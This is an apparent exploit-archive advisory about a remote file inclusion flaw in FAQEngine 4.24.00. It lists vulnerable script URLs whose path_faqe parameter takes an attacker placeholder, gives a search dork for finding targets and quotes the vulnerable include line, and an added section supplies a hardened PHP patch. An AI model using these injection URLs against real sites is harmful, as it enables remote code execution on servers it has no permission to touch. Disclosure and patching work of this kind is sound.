
FAQEngine 4.24.00 - Remote File Inclusion vulnerability

Author: kaMtiEz
Risk: [ Security Risk Unsorted ]
0day-ID: 0day-ID-10661
Category: web applications
Date added: 11-01-2010
Platform: unsorted
=======================================================
FAQEngine 4.24.00 - Remote File Inclusion vulnerability
=======================================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.boesch-it.de/
[+] Download : http://www.boesch-it.de/sw/faqengine.php?lang=en
[+] Version : 4.24.00 (lower versions may also be affected)
[+] Vulnerability : Remote File Inclusion
[+] Dork : "Think iT"
[+] Price : -           
[+] Location : INDONESIA - JOGJA
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]
 
etc etc etc .. too much ..
 
[ ERROR IN ]
 
require_once($path_faqe."/includes/global.inc.php");
 
[ FIX ]
 
dunno .. :P~~
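
One way to close the hole in the require_once line above, as an added example that is not part of the original advisory and not FAQEngine's own code. It assumes the request parameter reaches $path_faqe through register_globals or a similar import of request data, and that the affected scripts sit one directory below the install root; faqe_safe_include_path() is a hypothetical helper name.

```php
<?php
// Added example, not FAQEngine's own code: hardened replacement for
//   require_once($path_faqe."/includes/global.inc.php");
// Assumption: this script lives one level below the install root, so the
// root is dirname(__DIR__). Adjust to the real directory layout.

// 1. Reject any request that tries to supply the include base itself. With
//    register_globals (or an extract() of request data) such a parameter
//    would otherwise become $path_faqe before the require runs.
foreach (array($_GET, $_POST, $_COOKIE) as $input) {
    if (array_key_exists('path_faqe', $input)) {
        header('HTTP/1.1 400 Bad Request');
        exit('Bad request');
    }
}

// 2. Derive the base from the filesystem, never from user input.
$path_faqe = dirname(__DIR__);

// 3. Resolve the target and confirm it is a real file under the base.
//    realpath() returns false for URLs and for paths that do not exist.
function faqe_safe_include_path($base, $relative)
{
    $baseReal = realpath($base);
    $target   = realpath($base . '/' . $relative);
    if ($baseReal === false || $target === false) {
        return false;
    }
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : false;
}

$global_inc = faqe_safe_include_path($path_faqe, 'includes/global.inc.php');
if ($global_inc === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('Configuration error');
}
require_once $global_inc;
```

Setting register_globals = Off and allow_url_include = Off in php.ini removes the same path at the interpreter level and covers scripts that have not been patched yet.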



#  0day.today [2024-12-24]  #